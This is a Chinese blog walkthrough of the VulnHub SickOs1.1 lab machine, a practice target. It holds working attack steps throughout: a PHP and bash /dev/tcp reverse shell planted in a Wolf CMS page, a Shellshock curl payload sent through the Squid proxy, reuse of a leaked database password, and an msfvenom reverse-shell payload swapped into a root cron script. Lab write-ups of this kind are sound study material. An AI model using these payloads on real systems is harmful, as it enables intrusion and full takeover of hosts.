vulnhub靶场之SickOs1.1(一)

已于 2023-02-05 16:51:15 修改
阅读量262 收藏
点赞数
分类专栏: vulnhub打靶学习 文章标签: 网络安全
于 2023-02-05 16:45:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47404018/article/details/128891566
版权

靶场考察知识

shellshock漏洞

shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统
bash使用的环境变量是通过函数名称来调用的,以"(){"开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “}” 为结束,而是执行其后的恶意shell命令
执行CGI 时会调用Bash将Referer、host、UserAgent、header等作为环境变量进行处理

Linux计划任务提权

重点查看以下计划任务文件是否有可提权的操作

  • /etc/crontab
  • /etc/cron.d/*
  • /etc/cron.daily/*
  • /etc/cron.hourly/*
  • /etc/cron.monthly/*
  • /etc/cron.weekly/

数据库配置文件泄露

通常在网站的根目录或者config目录会保存着数据库配置文件, 此文件存有数据库用户的相关信息, 可能会对后续用户的登录爆破起到至关重要的作用

靶场搭建

SickOS靶场的下载地址: https://download.vulnhub.com/sickos/sick0s1.1.7z
直接在虚拟机–文件功能–打开就行了。

渗透测试

信息收集

主机发现

查看kaliIP ifconfig
image.png
靶机设置的桥接模式,所以直接扫C段

扫描C段存活主机:nmap -sn 192.168.0.0/24
nmap -sP 192.168.0.0/24
也可以使用arp-scan探测网段内目标
arp-scan -l

image.png
image.png
可以确定IP192.168.0.109为靶机IP

端口扫描
nmap -sV -n -p- 192.168.0.109
nmap -sS -A IP
分别使用TCP和UDP扫描目标主机的开放端口
nmap -sV --min-rate 10000 -p- IP    默认使用TCP扫描
nmap -sU -p22,3128,8080 IP

image.png
image.png
image.png
image.png
由上图扫描结果得知以下信息
开放端口:22,3128,8080
目标主机系统为Ubuntu Linux 3128端口为squid代理服务
使用nmap自带的web漏扫脚本进行扫描, 没有发现漏洞

nmap --script=vuln -p22,3128,8080 192.168.0.109
目录爆破

常规思路是直接访问3128端口 和8080端口 结果是无法访问。因此需要设置代理访问。
image.png
image.png

dirb扫描

因为3128开放了代理服务 可以借助他的代理来访问可用dirb扫描一些web目录

dirb http://192.168.0.109 -p http://192.168.0.109:3128

image.png

nikto扫描
nikto -host htpp://192.168.0.109:3128
dirsearch扫描
python3 dirsearch.py -u http://192.168.0.109 -phttp://192.168.0.109:3128

扫描结果如下所示
image.png
由上面三种扫描结果可知存在 robots.txt文件 因为无法直接访问因此在浏览器上设置代理。在foxyproxy上设置代理即可。
image.png
image.png

Wolf CMS介绍

Wolf CMS是一种内容管理系统,并且免费。其由PHP编码语言写成。Wolf CMS 0.8.2以及之前版本中存在文件上传漏洞。攻击者可以滥用上传特性来上传恶意的PHP文件到程序中,最终导致任意远程代码执行。
上述可知网站CMS为wolfcms,访问看看有啥东西。
image.png
网上搜索相关CMS漏洞复现文章 存在文件上传漏洞
https://cloud.tencent.com/developer/article/1047292
或是kali搜索wolfcms相关漏洞POC

searchsploit Wolf CMS 
locate 38000
cat /usr/share/exploitdb/exploits/php/webapps/38000.txt

image.png
image.png
发现后台路径

/wolfcms/?/admin/plugin/file_manager/browse/

image.png

漏洞挖掘

尝试访问 弱口令 admin admin登录后台
image.png
image.png

写入文件反弹SHELL

熟悉各个功能之后发现 在Atricles的编辑页面处添加上一行php反弹shell代码然后保存

设置kaliIP和端口
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.110/4488 0>&1'");?>

image.png
image.png
kali监听本机的4444端口, 然后点击Atricles页面触发反弹shell代码

nc -lvp 4488
http://192.168.0.109/wolfcms/?articles.html  访问含有反弹shell代码的页面

image.png
image.png
拿到shell
image.png

上传文件反弹shell

可以发现还有其他功能点有写入,上传文件的权限,可以上传一句话马,然后蚁剑开启代理连接。
image.png
使用kali自带的脚本文件反弹shell

cd /usr/share/webshells/
cd php 
cat php-reverse-shell.php

image.png
cat 文件之后 标记处设置你的kaliIP 和端口
image.png
image.png
然后将文件上传到靶机上
image.png
kali上开启监听 访问shell地址:http://192.168.0.109/wolfcms/public/shell.php 触发

nc -lvp 1234

返回shell
image.png
查看有哪些用户 发现root 和sickos

cat /etc/passwd | grep /bin/bash

image.png

shellshock 漏洞反弹shell

尝试使用ShellShock漏洞的exp, 执行whoami命令, 页面输出命令的执行结果

curl --proxy http://192.168.0.109:3128 -H "User-Agent:() { :;};echo;/usr/bin/whoami" http://192.168.0.109/cgi-bin/status

image.png
kali监听端口 利用ShellShock漏洞远程执行反弹shell命令

curl --proxy http://192.168.0.109:3128 -H "User-Agent:() { :;};/bin/bash -i >& /dev/tcp/192.168.0.110/4455 0>&1" http://192.168.0.109/cgi-bin/status

image.png
也可以使用kali自带 脚本shellshock

searchsploit Shellshock
locate linux/remote/34900.py
cp /usr/share/exploitdb/exploits/linux/remote/34900.py .   后面有个点 复制到当前目录

python2 34900.py payload=reverse rhost=192.168.0.109 lhost=192.168.0.110 lport=5545 proxy=192.168.0.109:3128 pages=/cgi-bin/status/

image.png
image.png
image.png
还可以使用wget反弹shell

主机渗透

获取主机基本信息

收集目标主机的基本信息,当前shell的用户名为www-data 该用户没有root权限
www-data用户通常用于前后端的数据交互
image.png

发现网站配置文件

image.png
发现数据库账号密码
image.png

尝试登录root权限的用户

查看etc/passwd文件, 像这里root、backup、sickos这些拥有bash环境的用户都要尝试使用上述的密码进行登录, 毕竟有时候网站的管理员会将数据库的密码和系统主机的密码设置成相同的
image.png
发现只有sickos用户登录成功 输入密码john@123
image.png
输入sudo -l, 查看当前用户权限为(ALL; ALL;ALL), 即拥有root用户权限

获取flag

执行sudo /bin/bash提权, 随后获取flag
image.png
image.png

计划任务提权

查看目标主机是否安装了python: dpkg -l | grep “python”, 可以发现目标主机只安装了python2
image.png
查看/etc/crontab, 没有可利用的计划任务

cat /etc/crontab

image.png
查看/etc/cron.d/ 目录下的文件 发现automate文件有个计划任务,该计划任务内容是每分钟以root用户用python执行/var/www/connect.py 下的文件 ,这样就可以修改py文件的内容,执行py反弹shell,获取root用户的shell。
image.png
msf生成python反弹shell代码,然后复制双引号内代码 vim /var/www/connect.py

msfvenom -p cmd/unix/reverse_python lhost=192.168.0.110 lport=1587 -f raw

image.png
shell环境下vim有点变态 执行vim编辑之后
image.png
输入e
image.png
然后输入o,粘贴代码进去,按esc键加 : 冒号 加wq之后按回车键即可
image.png
然后开启监听,一分钟之后返回shell root权限。
image.png

总结

第一次打vulnhub靶机还是花了很长时间,也参考了其他师傅的优秀文章。收录了其他师傅打靶的攻击思路,文章中用了多种方法多个工具进行信息收集,反弹shell等思路。
对kali里面工具的不熟悉,反弹shell相关的知识需要加强,以及计划任务提权的学习。wolf cms漏洞的利用。

参考链接

https://www.cnblogs.com/henry666/p/16954510.html
https://zhuanlan.zhihu.com/p/524694247
https://www.runoob.com/w3cnote/linux-crontab-tasks.html

你还心动嘛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机:SICKOS_ 1.1
LainWith的博客
12-09 665
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 9118
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vunlnhub:靶机DC-9渗透详解
m0_65712192的博客
03-06 1009
Vunlnhub:靶机DC-9渗透详解
Vulnhub靶场渗透-narak
paidx0
09-19 981
前言 靶机IP(192.168.110.131) 攻击机IP(192.168.110.127) 网络连接NAT模式 不多说直接开始吧 信息收集 还是常规的先扫端口和目录 先访问网页看看都有些什么,扫到的目录也打开看看 主页没啥东西全都是图片,注意到webdav可以打开,但需要连接的账号密码 所以现在的思路就是可能需要通过 webdav来上传文件,再访问拿到webshell 漏洞挖掘 现在考虑通过爆破的方式去登录 webdav,但是爆破需要一个好用的字典 这里可以用 cewl 来制作字典 cew
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2214
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 ...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
代码审计之_wolfcms漏洞
whojoe的博客
04-12 638
wolfcms代码审计 1.审计过程 审计同样是使用主动加被动扫描,这样可以帮帮助你对一些你没有注意到的参数进行测试,特别在黑盒审计的过程中,特别有作用,当然大佬当我啥也没说。我是在这小白逗小白的。嘻嘻嘻。同样和审计douphp时,漏洞存在与安装文件配置中,没有对于是否安装进行验证,导致新配置一样可以写入到配置文件中,尽管使用了单引号包裹参数,但是没有对于数据进行全局过滤,导致了可以任意命令执行,...
wolfcms
dbeidouxingf的博客
03-15 939
wolfcms安装: 1.将wolfcms下载后放到www目录下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-u3x40Gli-1584242756029)(F:\图片\素材\wolfcms2.png)] 2.再浏览器中输入wolf文件路径,访问该文件 3.点击 Continue to install,进行下一步 输入数据库用户名和密码,点击下一步。 4.进行...
wolfcms漏洞
qq_34304107的博客
02-23 953
利用CMS的上传功能结合Apache的文件名解析漏洞,前提需要以管理员权限登入后台参考链接:https://mochazz.github.io/2017/07/06/wolf_cms/                 http://www.freebuf.com/articles/web/138640.html...
Vulnhub 靶机 SickOs1.1 write up 配置squid代理,wolfcms getshell sudo提权
YouthBelief的博客
01-03 3823
0x00 环境准备 下载链接 https://download.vulnhub.com/sickos/sick0s1.1.7z 运行环境 Vmware 目标 root + flag 0x01 信息收集 靶机IP探测 nmap -sP 192.168.157.0/24 端口服务探测 nmap -sC -sV -A -p- 192.168.157.169 -o port.txt 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9336
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2445
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
yum安装实现lamp分离及Xcache加速
weixin_34356138的博客
04-22 141
LAMP的搭建: 准备前提: 虚拟机:Centos7 172.18.250.77 安装httpd,通过Fcgi模块来跟php互动,只处理静态网页。 虚拟机:Centos7 172.18.250.78 安装php-fpm程序,php-5.3.3的版本已经包含了php-fpm,不需要在打补丁,但CentOS6上官方源没有php-fpm...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【Datawhale AI 夏令营第三期学习笔记Taks1】 跑通baseline #Datawhale AI 夏令营
07-28
【Datawhale AI 夏令营第三期学习笔记Taks1】 跑通baseline #Datawhale AI 夏令营
餐厅营销策划方案.doc
07-28
商业计划书,创业计划书,项目计划书,计划书模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
OpenMv串口通信,接收数据
最新发布
07-28
OpenMV 是一个开源的机器视觉平台,它为嵌入式系统提供了强大的图像处理能力。OpenMV 主要面向对机器视觉有需求的开发者和爱好者,通过其强大的微控制器和摄像头模块,用户可以在低成本的前提下实现复杂的视觉任务。OpenMV 既可以用于教育领域,帮助学生理解图像处理和计算机视觉的基础知识,也可以用于工业应用,实现自动化检测、分类和导航等功能。 在 OpenMV 系统中,通信模块是实现与其他设备或系统互联互通的关键部分。OpenMV 支持多种通信协议,包括串口通信(UART)、I2C、SPI、CAN 和 USB 等。这些通信接口使得 OpenMV 可以方便地与各种传感器、执行器以及其他嵌入式设备进行数据交换,从而扩展其应用范围和功能。 串口通信(UART)是一种广泛应用于嵌入式系统的通信方式,具有实现简单、成本低廉的优点。OpenMV 的 UART 接口可以与单片机、PC 甚至其他 OpenMV 板卡进行数据传输,使得图像数据和处理结果能够及时传递给其他系统。这个是电赛智能送药小车利用openMv进行的串口通信接收数据的代码
vulnhub靶机系列:
09-09
Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你还心动嘛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值